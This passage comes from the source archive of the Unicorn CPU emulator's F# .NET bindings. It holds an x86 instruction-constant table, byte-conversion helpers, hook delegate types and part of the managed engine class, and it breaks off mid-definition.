UC_X86_INS_VINSERTPS = 910 let UC_X86_INS_VLDDQU = 911 let UC_X86_INS_VLDMXCSR = 912 let UC_X86_INS_VMASKMOVDQU = 913 let UC_X86_INS_VMASKMOVPD = 914 let UC_X86_INS_VMASKMOVPS = 915 let UC_X86_INS_VMAXPD = 916 let UC_X86_INS_VMAXPS = 917 let UC_X86_INS_VMAXSD = 918 let UC_X86_INS_VMAXSS = 919 let UC_X86_INS_VMCALL = 920 let UC_X86_INS_VMCLEAR = 921 let UC_X86_INS_VMFUNC = 922 let UC_X86_INS_VMINPD = 923 let UC_X86_INS_VMINPS = 924 let UC_X86_INS_VMINSD = 925 let UC_X86_INS_VMINSS = 926 let UC_X86_INS_VMLAUNCH = 927 let UC_X86_INS_VMLOAD = 928 let UC_X86_INS_VMMCALL = 929 let UC_X86_INS_VMOVQ = 930 let UC_X86_INS_VMOVDDUP = 931 let UC_X86_INS_VMOVD = 932 let UC_X86_INS_VMOVDQA32 = 933 let UC_X86_INS_VMOVDQA64 = 934 let UC_X86_INS_VMOVDQA = 935 let UC_X86_INS_VMOVDQU16 = 936 let UC_X86_INS_VMOVDQU32 = 937 let UC_X86_INS_VMOVDQU64 = 938 let UC_X86_INS_VMOVDQU8 = 939 let UC_X86_INS_VMOVDQU = 940 let UC_X86_INS_VMOVHLPS = 941 let UC_X86_INS_VMOVHPD = 942 let UC_X86_INS_VMOVHPS = 943 let UC_X86_INS_VMOVLHPS = 944 let UC_X86_INS_VMOVLPD = 945 let UC_X86_INS_VMOVLPS = 946 let UC_X86_INS_VMOVMSKPD = 947 let UC_X86_INS_VMOVMSKPS = 948 let UC_X86_INS_VMOVNTDQA = 949 let UC_X86_INS_VMOVNTDQ = 950 let UC_X86_INS_VMOVNTPD = 951 let UC_X86_INS_VMOVNTPS = 952 let UC_X86_INS_VMOVSD = 953 let UC_X86_INS_VMOVSHDUP = 954 let UC_X86_INS_VMOVSLDUP = 955 let UC_X86_INS_VMOVSS = 956 let UC_X86_INS_VMOVUPD = 957 let UC_X86_INS_VMOVUPS = 958 let UC_X86_INS_VMPSADBW = 959 let UC_X86_INS_VMPTRLD = 960 let UC_X86_INS_VMPTRST = 961 let UC_X86_INS_VMREAD = 962 let UC_X86_INS_VMRESUME = 963 let UC_X86_INS_VMRUN = 964 let UC_X86_INS_VMSAVE = 965 let UC_X86_INS_VMULPD = 966 let UC_X86_INS_VMULPS = 967 let UC_X86_INS_VMULSD = 968 let UC_X86_INS_VMULSS = 969 let UC_X86_INS_VMWRITE = 970 let UC_X86_INS_VMXOFF = 971 let UC_X86_INS_VMXON = 972 let UC_X86_INS_VPABSB = 973 let UC_X86_INS_VPABSD = 974 let UC_X86_INS_VPABSQ = 975 let UC_X86_INS_VPABSW = 976 let UC_X86_INS_VPACKSSDW = 977 let UC_X86_INS_VPACKSSWB = 978 let UC_X86_INS_VPACKUSDW = 979 let UC_X86_INS_VPACKUSWB = 980 let UC_X86_INS_VPADDB = 981 let UC_X86_INS_VPADDD = 982 let UC_X86_INS_VPADDQ = 983 let UC_X86_INS_VPADDSB = 984 let UC_X86_INS_VPADDSW = 985 let UC_X86_INS_VPADDUSB = 986 let UC_X86_INS_VPADDUSW = 987 let UC_X86_INS_VPADDW = 988 let UC_X86_INS_VPALIGNR = 989 let UC_X86_INS_VPANDD = 990 let UC_X86_INS_VPANDND = 991 let UC_X86_INS_VPANDNQ = 992 let UC_X86_INS_VPANDN = 993 let UC_X86_INS_VPANDQ = 994 let UC_X86_INS_VPAND = 995 let UC_X86_INS_VPAVGB = 996 let UC_X86_INS_VPAVGW = 997 let UC_X86_INS_VPBLENDD = 998 let UC_X86_INS_VPBLENDMB = 999 let UC_X86_INS_VPBLENDMD = 1000 let UC_X86_INS_VPBLENDMQ = 1001 let UC_X86_INS_VPBLENDMW = 1002 let UC_X86_INS_VPBLENDVB = 1003 let UC_X86_INS_VPBLENDW = 1004 let UC_X86_INS_VPBROADCASTB = 1005 let UC_X86_INS_VPBROADCASTD = 1006 let UC_X86_INS_VPBROADCASTMB2Q = 1007 let UC_X86_INS_VPBROADCASTMW2D = 1008 let UC_X86_INS_VPBROADCASTQ = 1009 let UC_X86_INS_VPBROADCASTW = 1010 let UC_X86_INS_VPCLMULQDQ = 1011 let UC_X86_INS_VPCMOV = 1012 let UC_X86_INS_VPCMPB = 1013 let UC_X86_INS_VPCMPD = 1014 let UC_X86_INS_VPCMPEQB = 1015 let UC_X86_INS_VPCMPEQD = 1016 let UC_X86_INS_VPCMPEQQ = 1017 let UC_X86_INS_VPCMPEQW = 1018 let UC_X86_INS_VPCMPESTRI = 1019 let UC_X86_INS_VPCMPESTRM = 1020 let UC_X86_INS_VPCMPGTB = 1021 let UC_X86_INS_VPCMPGTD = 1022 let UC_X86_INS_VPCMPGTQ = 1023 let UC_X86_INS_VPCMPGTW = 1024 let UC_X86_INS_VPCMPISTRI = 1025 let UC_X86_INS_VPCMPISTRM = 1026 let UC_X86_INS_VPCMPQ = 1027 let UC_X86_INS_VPCMPUB = 1028 let UC_X86_INS_VPCMPUD = 1029 let UC_X86_INS_VPCMPUQ = 1030 let UC_X86_INS_VPCMPUW = 1031 let UC_X86_INS_VPCMPW = 1032 let UC_X86_INS_VPCOMB = 1033 let UC_X86_INS_VPCOMD = 1034 let UC_X86_INS_VPCOMPRESSD = 1035 let UC_X86_INS_VPCOMPRESSQ = 1036 let UC_X86_INS_VPCOMQ = 1037 let UC_X86_INS_VPCOMUB = 1038 let UC_X86_INS_VPCOMUD = 1039 let UC_X86_INS_VPCOMUQ = 1040 let UC_X86_INS_VPCOMUW = 1041 let UC_X86_INS_VPCOMW = 1042 let UC_X86_INS_VPCONFLICTD = 1043 let UC_X86_INS_VPCONFLICTQ = 1044 let UC_X86_INS_VPERM2F128 = 1045 let UC_X86_INS_VPERM2I128 = 1046 let UC_X86_INS_VPERMD = 1047 let UC_X86_INS_VPERMI2D = 1048 let UC_X86_INS_VPERMI2PD = 1049 let UC_X86_INS_VPERMI2PS = 1050 let UC_X86_INS_VPERMI2Q = 1051 let UC_X86_INS_VPERMIL2PD = 1052 let UC_X86_INS_VPERMIL2PS = 1053 let UC_X86_INS_VPERMILPD = 1054 let UC_X86_INS_VPERMILPS = 1055 let UC_X86_INS_VPERMPD = 1056 let UC_X86_INS_VPERMPS = 1057 let UC_X86_INS_VPERMQ = 1058 let UC_X86_INS_VPERMT2D = 1059 let UC_X86_INS_VPERMT2PD = 1060 let UC_X86_INS_VPERMT2PS = 1061 let UC_X86_INS_VPERMT2Q = 1062 let UC_X86_INS_VPEXPANDD = 1063 let UC_X86_INS_VPEXPANDQ = 1064 let UC_X86_INS_VPEXTRB = 1065 let UC_X86_INS_VPEXTRD = 1066 let UC_X86_INS_VPEXTRQ = 1067 let UC_X86_INS_VPEXTRW = 1068 let UC_X86_INS_VPGATHERDD = 1069 let UC_X86_INS_VPGATHERDQ = 1070 let UC_X86_INS_VPGATHERQD = 1071 let UC_X86_INS_VPGATHERQQ = 1072 let UC_X86_INS_VPHADDBD = 1073 let UC_X86_INS_VPHADDBQ = 1074 let UC_X86_INS_VPHADDBW = 1075 let UC_X86_INS_VPHADDDQ = 1076 let UC_X86_INS_VPHADDD = 1077 let UC_X86_INS_VPHADDSW = 1078 let UC_X86_INS_VPHADDUBD = 1079 let UC_X86_INS_VPHADDUBQ = 1080 let UC_X86_INS_VPHADDUBW = 1081 let UC_X86_INS_VPHADDUDQ = 1082 let UC_X86_INS_VPHADDUWD = 1083 let UC_X86_INS_VPHADDUWQ = 1084 let UC_X86_INS_VPHADDWD = 1085 let UC_X86_INS_VPHADDWQ = 1086 let UC_X86_INS_VPHADDW = 1087 let UC_X86_INS_VPHMINPOSUW = 1088 let UC_X86_INS_VPHSUBBW = 1089 let UC_X86_INS_VPHSUBDQ = 1090 let UC_X86_INS_VPHSUBD = 1091 let UC_X86_INS_VPHSUBSW = 1092 let UC_X86_INS_VPHSUBWD = 1093 let UC_X86_INS_VPHSUBW = 1094 let UC_X86_INS_VPINSRB = 1095 let UC_X86_INS_VPINSRD = 1096 let UC_X86_INS_VPINSRQ = 1097 let UC_X86_INS_VPINSRW = 1098 let UC_X86_INS_VPLZCNTD = 1099 let UC_X86_INS_VPLZCNTQ = 1100 let UC_X86_INS_VPMACSDD = 1101 let UC_X86_INS_VPMACSDQH = 1102 let UC_X86_INS_VPMACSDQL = 1103 let UC_X86_INS_VPMACSSDD = 1104 let UC_X86_INS_VPMACSSDQH = 1105 let UC_X86_INS_VPMACSSDQL = 1106 let UC_X86_INS_VPMACSSWD = 1107 let UC_X86_INS_VPMACSSWW = 1108 let UC_X86_INS_VPMACSWD = 1109 let UC_X86_INS_VPMACSWW = 1110 let UC_X86_INS_VPMADCSSWD = 1111 let UC_X86_INS_VPMADCSWD = 1112 let UC_X86_INS_VPMADDUBSW = 1113 let UC_X86_INS_VPMADDWD = 1114 let UC_X86_INS_VPMASKMOVD = 1115 let UC_X86_INS_VPMASKMOVQ = 1116 let UC_X86_INS_VPMAXSB = 1117 let UC_X86_INS_VPMAXSD = 1118 let UC_X86_INS_VPMAXSQ = 1119 let UC_X86_INS_VPMAXSW = 1120 let UC_X86_INS_VPMAXUB = 1121 let UC_X86_INS_VPMAXUD = 1122 let UC_X86_INS_VPMAXUQ = 1123 let UC_X86_INS_VPMAXUW = 1124 let UC_X86_INS_VPMINSB = 1125 let UC_X86_INS_VPMINSD = 1126 let UC_X86_INS_VPMINSQ = 1127 let UC_X86_INS_VPMINSW = 1128 let UC_X86_INS_VPMINUB = 1129 let UC_X86_INS_VPMINUD = 1130 let UC_X86_INS_VPMINUQ = 1131 let UC_X86_INS_VPMINUW = 1132 let UC_X86_INS_VPMOVDB = 1133 let UC_X86_INS_VPMOVDW = 1134 let UC_X86_INS_VPMOVM2B = 1135 let UC_X86_INS_VPMOVM2D = 1136 let UC_X86_INS_VPMOVM2Q = 1137 let UC_X86_INS_VPMOVM2W = 1138 let UC_X86_INS_VPMOVMSKB = 1139 let UC_X86_INS_VPMOVQB = 1140 let UC_X86_INS_VPMOVQD = 1141 let UC_X86_INS_VPMOVQW = 1142 let UC_X86_INS_VPMOVSDB = 1143 let UC_X86_INS_VPMOVSDW = 1144 let UC_X86_INS_VPMOVSQB = 1145 let UC_X86_INS_VPMOVSQD = 1146 let UC_X86_INS_VPMOVSQW = 1147 let UC_X86_INS_VPMOVSXBD = 1148 let UC_X86_INS_VPMOVSXBQ = 1149 let UC_X86_INS_VPMOVSXBW = 1150 let UC_X86_INS_VPMOVSXDQ = 1151 let UC_X86_INS_VPMOVSXWD = 1152 let UC_X86_INS_VPMOVSXWQ = 1153 let UC_X86_INS_VPMOVUSDB = 1154 let UC_X86_INS_VPMOVUSDW = 1155 let UC_X86_INS_VPMOVUSQB = 1156 let UC_X86_INS_VPMOVUSQD = 1157 let UC_X86_INS_VPMOVUSQW = 1158 let UC_X86_INS_VPMOVZXBD = 1159 let UC_X86_INS_VPMOVZXBQ = 1160 let UC_X86_INS_VPMOVZXBW = 1161 let UC_X86_INS_VPMOVZXDQ = 1162 let UC_X86_INS_VPMOVZXWD = 1163 let UC_X86_INS_VPMOVZXWQ = 1164 let UC_X86_INS_VPMULDQ = 1165 let UC_X86_INS_VPMULHRSW = 1166 let UC_X86_INS_VPMULHUW = 1167 let UC_X86_INS_VPMULHW = 1168 let UC_X86_INS_VPMULLD = 1169 let UC_X86_INS_VPMULLQ = 1170 let UC_X86_INS_VPMULLW = 1171 let UC_X86_INS_VPMULUDQ = 1172 let UC_X86_INS_VPORD = 1173 let UC_X86_INS_VPORQ = 1174 let UC_X86_INS_VPOR = 1175 let UC_X86_INS_VPPERM = 1176 let UC_X86_INS_VPROTB = 1177 let UC_X86_INS_VPROTD = 1178 let UC_X86_INS_VPROTQ = 1179 let UC_X86_INS_VPROTW = 1180 let UC_X86_INS_VPSADBW = 1181 let UC_X86_INS_VPSCATTERDD = 1182 let UC_X86_INS_VPSCATTERDQ = 1183 let UC_X86_INS_VPSCATTERQD = 1184 let UC_X86_INS_VPSCATTERQQ = 1185 let UC_X86_INS_VPSHAB = 1186 let UC_X86_INS_VPSHAD = 1187 let UC_X86_INS_VPSHAQ = 1188 let UC_X86_INS_VPSHAW = 1189 let UC_X86_INS_VPSHLB = 1190 let UC_X86_INS_VPSHLD = 1191 let UC_X86_INS_VPSHLQ = 1192 let UC_X86_INS_VPSHLW = 1193 let UC_X86_INS_VPSHUFB = 1194 let UC_X86_INS_VPSHUFD = 1195 let UC_X86_INS_VPSHUFHW = 1196 let UC_X86_INS_VPSHUFLW = 1197 let UC_X86_INS_VPSIGNB = 1198 let UC_X86_INS_VPSIGND = 1199 let UC_X86_INS_VPSIGNW = 1200 let UC_X86_INS_VPSLLDQ = 1201 let UC_X86_INS_VPSLLD = 1202 let UC_X86_INS_VPSLLQ = 1203 let UC_X86_INS_VPSLLVD = 1204 let UC_X86_INS_VPSLLVQ = 1205 let UC_X86_INS_VPSLLW = 1206 let UC_X86_INS_VPSRAD = 1207 let UC_X86_INS_VPSRAQ = 1208 let UC_X86_INS_VPSRAVD = 1209 let UC_X86_INS_VPSRAVQ = 1210 let UC_X86_INS_VPSRAW = 1211 let UC_X86_INS_VPSRLDQ = 1212 let UC_X86_INS_VPSRLD = 1213 let UC_X86_INS_VPSRLQ = 1214 let UC_X86_INS_VPSRLVD = 1215 let UC_X86_INS_VPSRLVQ = 1216 let UC_X86_INS_VPSRLW = 1217 let UC_X86_INS_VPSUBB = 1218 let UC_X86_INS_VPSUBD = 1219 let UC_X86_INS_VPSUBQ = 1220 let UC_X86_INS_VPSUBSB = 1221 let UC_X86_INS_VPSUBSW = 1222 let UC_X86_INS_VPSUBUSB = 1223 let UC_X86_INS_VPSUBUSW = 1224 let UC_X86_INS_VPSUBW = 1225 let UC_X86_INS_VPTESTMD = 1226 let UC_X86_INS_VPTESTMQ = 1227 let UC_X86_INS_VPTESTNMD = 1228 let UC_X86_INS_VPTESTNMQ = 1229 let UC_X86_INS_VPTEST = 1230 let UC_X86_INS_VPUNPCKHBW = 1231 let UC_X86_INS_VPUNPCKHDQ = 1232 let UC_X86_INS_VPUNPCKHQDQ = 1233 let UC_X86_INS_VPUNPCKHWD = 1234 let UC_X86_INS_VPUNPCKLBW = 1235 let UC_X86_INS_VPUNPCKLDQ = 1236 let UC_X86_INS_VPUNPCKLQDQ = 1237 let UC_X86_INS_VPUNPCKLWD = 1238 let UC_X86_INS_VPXORD = 1239 let UC_X86_INS_VPXORQ = 1240 let UC_X86_INS_VPXOR = 1241 let UC_X86_INS_VRCP14PD = 1242 let UC_X86_INS_VRCP14PS = 1243 let UC_X86_INS_VRCP14SD = 1244 let UC_X86_INS_VRCP14SS = 1245 let UC_X86_INS_VRCP28PD = 1246 let UC_X86_INS_VRCP28PS = 1247 let UC_X86_INS_VRCP28SD = 1248 let UC_X86_INS_VRCP28SS = 1249 let UC_X86_INS_VRCPPS = 1250 let UC_X86_INS_VRCPSS = 1251 let UC_X86_INS_VRNDSCALEPD = 1252 let UC_X86_INS_VRNDSCALEPS = 1253 let UC_X86_INS_VRNDSCALESD = 1254 let UC_X86_INS_VRNDSCALESS = 1255 let UC_X86_INS_VROUNDPD = 1256 let UC_X86_INS_VROUNDPS = 1257 let UC_X86_INS_VROUNDSD = 1258 let UC_X86_INS_VROUNDSS = 1259 let UC_X86_INS_VRSQRT14PD = 1260 let UC_X86_INS_VRSQRT14PS = 1261 let UC_X86_INS_VRSQRT14SD = 1262 let UC_X86_INS_VRSQRT14SS = 1263 let UC_X86_INS_VRSQRT28PD = 1264 let UC_X86_INS_VRSQRT28PS = 1265 let UC_X86_INS_VRSQRT28SD = 1266 let UC_X86_INS_VRSQRT28SS = 1267 let UC_X86_INS_VRSQRTPS = 1268 let UC_X86_INS_VRSQRTSS = 1269 let UC_X86_INS_VSCATTERDPD = 1270 let UC_X86_INS_VSCATTERDPS = 1271 let UC_X86_INS_VSCATTERPF0DPD = 1272 let UC_X86_INS_VSCATTERPF0DPS = 1273 let UC_X86_INS_VSCATTERPF0QPD = 1274 let UC_X86_INS_VSCATTERPF0QPS = 1275 let UC_X86_INS_VSCATTERPF1DPD = 1276 let UC_X86_INS_VSCATTERPF1DPS = 1277 let UC_X86_INS_VSCATTERPF1QPD = 1278 let UC_X86_INS_VSCATTERPF1QPS = 1279 let UC_X86_INS_VSCATTERQPD = 1280 let UC_X86_INS_VSCATTERQPS = 1281 let UC_X86_INS_VSHUFPD = 1282 let UC_X86_INS_VSHUFPS = 1283 let UC_X86_INS_VSQRTPD = 1284 let UC_X86_INS_VSQRTPS = 1285 let UC_X86_INS_VSQRTSD = 1286 let UC_X86_INS_VSQRTSS = 1287 let UC_X86_INS_VSTMXCSR = 1288 let UC_X86_INS_VSUBPD = 1289 let UC_X86_INS_VSUBPS = 1290 let UC_X86_INS_VSUBSD = 1291 let UC_X86_INS_VSUBSS = 1292 let UC_X86_INS_VTESTPD = 1293 let UC_X86_INS_VTESTPS = 1294 let UC_X86_INS_VUNPCKHPD = 1295 let UC_X86_INS_VUNPCKHPS = 1296 let UC_X86_INS_VUNPCKLPD = 1297 let UC_X86_INS_VUNPCKLPS = 1298 let UC_X86_INS_VZEROALL = 1299 let UC_X86_INS_VZEROUPPER = 1300 let UC_X86_INS_WAIT = 1301 let UC_X86_INS_WBINVD = 1302 let UC_X86_INS_WRFSBASE = 1303 let UC_X86_INS_WRGSBASE = 1304 let UC_X86_INS_WRMSR = 1305 let UC_X86_INS_XABORT = 1306 let UC_X86_INS_XACQUIRE = 1307 let UC_X86_INS_XBEGIN = 1308 let UC_X86_INS_XCHG = 1309 let UC_X86_INS_XCRYPTCBC = 1310 let UC_X86_INS_XCRYPTCFB = 1311 let UC_X86_INS_XCRYPTCTR = 1312 let UC_X86_INS_XCRYPTECB = 1313 let UC_X86_INS_XCRYPTOFB = 1314 let UC_X86_INS_XEND = 1315 let UC_X86_INS_XGETBV = 1316 let UC_X86_INS_XLATB = 1317 let UC_X86_INS_XRELEASE = 1318 let UC_X86_INS_XRSTOR = 1319 let UC_X86_INS_XRSTOR64 = 1320 let UC_X86_INS_XRSTORS = 1321 let UC_X86_INS_XRSTORS64 = 1322 let UC_X86_INS_XSAVE = 1323 let UC_X86_INS_XSAVE64 = 1324 let UC_X86_INS_XSAVEC = 1325 let UC_X86_INS_XSAVEC64 = 1326 let UC_X86_INS_XSAVEOPT = 1327 let UC_X86_INS_XSAVEOPT64 = 1328 let UC_X86_INS_XSAVES = 1329 let UC_X86_INS_XSAVES64 = 1330 let UC_X86_INS_XSETBV = 1331 let UC_X86_INS_XSHA1 = 1332 let UC_X86_INS_XSHA256 = 1333 let UC_X86_INS_XSTORE = 1334 let UC_X86_INS_XTEST = 1335 let UC_X86_INS_FDISI8087_NOP = 1336 let UC_X86_INS_FENI8087_NOP = 1337 let UC_X86_INS_ENDING = 1338 unicorn-2.1.1/bindings/dotnet/UnicornEngine/ConvertUtility.fs000066400000000000000000000010401467524106700243720ustar00rootroot00000000000000namespace UnicornEngine open System [] module internal ConvertUtility = let int64ToBytes(v: Int64) = let res = Array.zeroCreate 8 let mutable uv = uint64 v for i = 0 to res.Length-1 do res.[i] <- byte (uv &&& uint64 0xFF) uv <- uv >>> 8 res let bytesToInt64(v: Byte array) = let mutable res = uint64 0 for i = 0 to v.Length-1 do let tmpV = v.[i] &&& byte 0xFF res <- res + (uint64 tmpV <<< (i * 8)) int64 resunicorn-2.1.1/bindings/dotnet/UnicornEngine/InternalHooks.fs000066400000000000000000000026341467524106700241600ustar00rootroot00000000000000namespace UnicornEngine open System open System.Runtime.InteropServices // internal hooks to be passed to native Unicorn library [] type internal CodeHookInternal = delegate of IntPtr * Int64 * Int32 * IntPtr -> unit [] type internal BlockHookInternal = delegate of IntPtr * Int64 * Int32 * IntPtr -> unit [] type internal InterruptHookInternal = delegate of IntPtr * Int32 * IntPtr -> unit [] type internal MemReadHookInternal = delegate of IntPtr * Int32 * Int64 * Int32 * IntPtr -> unit [] type internal MemWriteHookInternal = delegate of IntPtr * Int32 * Int64 * Int32 * Int64 * IntPtr -> unit [] type internal EventMemHookInternal = delegate of IntPtr * Int32 * Int64 * Int32 * Int64 * IntPtr-> Boolean [] type internal InHookInternal = delegate of IntPtr * Int32 * Int32 * IntPtr -> Int32 [] type internal OutHookInternal = delegate of IntPtr * Int32 * Int32 * Int32 * IntPtr -> unit [] type internal SyscallHookInternal = delegate of IntPtr * IntPtr -> unitunicorn-2.1.1/bindings/dotnet/UnicornEngine/Unicorn.fs000066400000000000000000000412771467524106700230230ustar00rootroot00000000000000namespace UnicornEngine open System open System.Collections.Generic open System.Runtime.InteropServices open System.Linq open UnicornEngine.Const open UnicornEngine.Binding // exported hooks type CodeHook = delegate of Unicorn * Int64 * Int32 * Object -> unit and BlockHook = delegate of Unicorn * Int64 * Int32 * Object -> unit and InterruptHook = delegate of Unicorn * Int32 * Object -> unit and MemReadHook = delegate of Unicorn * Int64 * Int32 * Object -> unit and MemWriteHook = delegate of Unicorn * Int64 * Int32 * Int64 * Object -> unit and EventMemHook = delegate of Unicorn * Int32 * Int64 * Int32 * Int64 * Object -> Boolean and InHook = delegate of Unicorn * Int32 * Int32 * Object -> Int32 and OutHook = delegate of Unicorn * Int32 * Int32 * Int32 * Object -> unit and SyscallHook = delegate of Unicorn * Object -> unit // the managed unicorn engine and Unicorn(arch: Int32, mode: Int32, binding: IBinding) = // hook callback list let _codeHooks = new List<(CodeHook * (UIntPtr * Object * Object))>() let _blockHooks = new List<(BlockHook * (UIntPtr * Object * Object))>() let _interruptHooks = new List<(InterruptHook * (UIntPtr * Object * Object))>() let _memReadHooks = new List<(MemReadHook * (UIntPtr * Object * Object))>() let _memWriteHooks = new List<(MemWriteHook * (UIntPtr * Object * Object))>() let _memEventHooks = new Dictionary>() let _inHooks = new List<(InHook * (UIntPtr * Object * Object))>() let _outHooks = new List<(OutHook * (UIntPtr * Object * Object))>() let _syscallHooks = new List<(SyscallHook * (UIntPtr * Object * Object))>() let _disposablePointers = new List() let _eventMemMap = [ (UC_HOOK_MEM_READ_UNMAPPED, UC_MEM_READ_UNMAPPED) (UC_HOOK_MEM_WRITE_UNMAPPED, UC_MEM_WRITE_UNMAPPED) (UC_HOOK_MEM_FETCH_UNMAPPED, UC_MEM_FETCH_UNMAPPED) (UC_HOOK_MEM_READ_PROT, UC_MEM_READ_PROT) (UC_HOOK_MEM_WRITE_PROT, UC_MEM_WRITE_PROT) (UC_HOOK_MEM_FETCH_PROT, UC_MEM_FETCH_PROT) ] |> dict let mutable _eng = [|UIntPtr.Zero|] let strError(errorNo: Int32) = let errorStringPointer = binding.Strerror(errorNo) Marshal.PtrToStringAnsi(errorStringPointer) let checkResult(errorCode: Int32) = // return the exception instead of raising it in order to have a more meaningful stack trace if errorCode <> Common.UC_ERR_OK then let errorMessage = strError(errorCode) Some <| UnicornEngineException(errorCode, errorMessage) else None let hookDel(callbacks: List<'a * (UIntPtr * Object * Object)>) (callback: 'a)= match callbacks |> Seq.tryFind(fun item -> match item with | (c, _) -> c = callback) with | Some(item) -> let (hh, _, _) = snd item match binding.HookDel(_eng.[0], hh) |> checkResult with | Some e -> raise e | None -> callbacks.Remove(item) |> ignore | None -> () let allocate(size: Int32) = let mem = Marshal.AllocHGlobal(size) _disposablePointers.Add(mem) mem.ToPointer() do // initialize event list _eventMemMap |> Seq.map(fun kv -> kv.Key) |> Seq.iter (fun eventType -> _memEventHooks.Add(eventType, new List())) // init engine _eng <- [|new UIntPtr(allocate(IntPtr.Size))|] let err = binding.UcOpen(uint32 arch, uint32 mode, _eng) if err <> Common.UC_ERR_OK then raise(ApplicationException(String.Format("Unable to open the Unicorn Engine. Error: {0}", err))) new(arch, mode) = new Unicorn(arch, mode, BindingFactory.getDefault()) member this.MemMap(address: Int64, size: Int64, perm: Int32) = let size = new UIntPtr(uint64 size) match binding.MemMap(_eng.[0], uint64 address, size, uint32 perm) |> checkResult with | Some e -> raise e | None -> () member this.MemMapPtr(address: Int64, size: Int64, perm: Int32, ptr: IntPtr) = let size = new UIntPtr(uint64 size) let ptr = new UIntPtr(ptr.ToPointer()) match binding.MemMapPtr(_eng.[0], uint64 address, size, uint32 perm, ptr) |> checkResult with | Some e -> raise e | None -> () member this.MemUnmap(address: Int64, size: Int64) = let size = new UIntPtr(uint64 size) match binding.MemUnmap(_eng.[0], uint64 address, size) |> checkResult with | Some e -> raise e | None -> () member this.MemProtect(address: Int64, size: Int64, ?perm: Int32) = let size = new UIntPtr(uint64 size) let perm = defaultArg perm Common.UC_PROT_ALL match binding.MemProtect(_eng.[0], uint64 address, size, uint32 perm) |> checkResult with | Some e -> raise e | None -> () member this.MemWrite(address: Int64, value: Byte array) = match binding.MemWrite(_eng.[0], uint64 address, value, new UIntPtr(uint32 value.Length)) |> checkResult with | Some e -> raise e | None -> () member this.MemRead(address: Int64, memValue: Byte array) = match binding.MemRead(_eng.[0], uint64 address, memValue, new UIntPtr(uint32 memValue.Length)) |> checkResult with | Some e -> raise e | None -> () member this.RegWrite(regId: Int32, value: Byte array) = match binding.RegWrite(_eng.[0], regId, value) |> checkResult with | Some e -> raise e | None -> () member this.RegWrite(regId: Int32, value: Int64) = this.RegWrite(regId, int64ToBytes value) member this.RegRead(regId: Int32, regValue: Byte array) = match binding.RegRead(_eng.[0], regId, regValue) |> checkResult with | Some e -> raise e | None -> () member this.RegRead(regId: Int32) = let buffer = Array.zeroCreate 8 this.RegRead(regId, buffer) bytesToInt64 buffer member this.EmuStart(beginAddr: Int64, untilAddr: Int64, timeout: Int64, count: Int64) = match binding.EmuStart(_eng.[0], uint64 beginAddr, uint64 untilAddr, uint64 timeout, uint64 count) |> checkResult with | Some e -> raise e | None -> () member this.EmuStop() = match binding.EmuStop(_eng.[0]) |> checkResult with | Some e -> raise e | None -> () member this.Close() = match binding.Close(_eng.[0]) |> checkResult with | Some e -> raise e | None -> () member this.ArchSupported(arch: Int32) = binding.ArchSupported(arch) member this.ErrNo() = binding.Errono(_eng.[0]) member this.AddCodeHook(callback: CodeHook, userData: Object, beginAddr: Int64, endAddr: Int64) = let trampoline(u: IntPtr) (addr: Int64) (size: Int32) (user: IntPtr) = callback.Invoke(this, addr, size, userData) let codeHookInternal = new CodeHookInternal(trampoline) let funcPointer = Marshal.GetFunctionPointerForDelegate(codeHookInternal) let hh = new UIntPtr(allocate(IntPtr.Size)) match binding.HookAddNoarg(_eng.[0], hh, Common.UC_HOOK_CODE, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, uint64 beginAddr, uint64 endAddr) |> checkResult with | Some e -> raise e | None -> () let hh = (unativeint)(Marshal.ReadIntPtr((nativeint)hh)) _codeHooks.Add(callback, (hh, userData, codeHookInternal)) member this.AddCodeHook(callback: CodeHook, beginAddr: Int64, endAddr: Int64) = this.AddCodeHook(callback, null, beginAddr, endAddr) member this.HookDel(callback: CodeHook) = hookDel _codeHooks callback member this.AddBlockHook(callback: BlockHook, userData: Object, beginAddr: Int64, endAddr: Int64) = let trampoline(u: IntPtr) (addr: Int64) (size: Int32) (user: IntPtr) = callback.Invoke(this, addr, size, userData) let blockHookInternal = new BlockHookInternal(trampoline) let funcPointer = Marshal.GetFunctionPointerForDelegate(blockHookInternal) let hh = new UIntPtr(allocate(IntPtr.Size)) match binding.HookAddNoarg(_eng.[0], hh, Common.UC_HOOK_BLOCK, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, uint64 beginAddr, uint64 endAddr) |> checkResult with | Some e -> raise e | None -> () let hh = (unativeint)(Marshal.ReadIntPtr((nativeint)hh)) _blockHooks.Add(callback, (hh, userData, blockHookInternal)) member this.HookDel(callback: BlockHook) = hookDel _blockHooks callback member this.AddInterruptHook(callback: InterruptHook, userData: Object, hookBegin: UInt64, hookEnd : UInt64) = let trampoline(u: IntPtr) (intNumber: Int32) (user: IntPtr) = callback.Invoke(this, intNumber, userData) let interruptHookInternal = new InterruptHookInternal(trampoline) let funcPointer = Marshal.GetFunctionPointerForDelegate(interruptHookInternal) let hh = new UIntPtr(allocate(IntPtr.Size)) match binding.HookAddNoarg(_eng.[0], hh, Common.UC_HOOK_INTR, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, hookBegin, hookEnd) |> checkResult with | Some e -> raise e | None -> () let hh = (unativeint)(Marshal.ReadIntPtr((nativeint)hh)) _interruptHooks.Add(callback, (hh, userData, interruptHookInternal)) member this.AddInterruptHook(callback: InterruptHook) = this.AddInterruptHook(callback, null, uint64 1, uint64 0) member this.HookDel(callback: InterruptHook) = hookDel _interruptHooks callback member this.AddMemReadHook(callback: MemReadHook, userData: Object, beginAddr: Int64, endAddr: Int64) = let trampoline(u: IntPtr) (_eventType: Int32) (addr: Int64) (size: Int32) (user: IntPtr) = callback.Invoke(this, addr, size, userData) let memReadHookInternal = new MemReadHookInternal(trampoline) let funcPointer = Marshal.GetFunctionPointerForDelegate(memReadHookInternal) let hh = new UIntPtr(allocate(IntPtr.Size)) match binding.HookAddNoarg(_eng.[0], hh, Common.UC_HOOK_MEM_READ, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, uint64 beginAddr, uint64 endAddr) |> checkResult with | Some e -> raise e | None -> () let hh = (unativeint)(Marshal.ReadIntPtr((nativeint)hh)) _memReadHooks.Add(callback, (hh, userData, memReadHookInternal)) member this.HookDel(callback: MemReadHook) = hookDel _memReadHooks callback member this.AddMemWriteHook(callback: MemWriteHook, userData: Object, beginAddr: Int64, endAddr: Int64) = let trampoline(u: IntPtr) (_eventType: Int32) (addr: Int64) (size: Int32) (value: Int64) (user: IntPtr) = callback.Invoke(this, addr, size, value, userData) let memWriteHookInternal = new 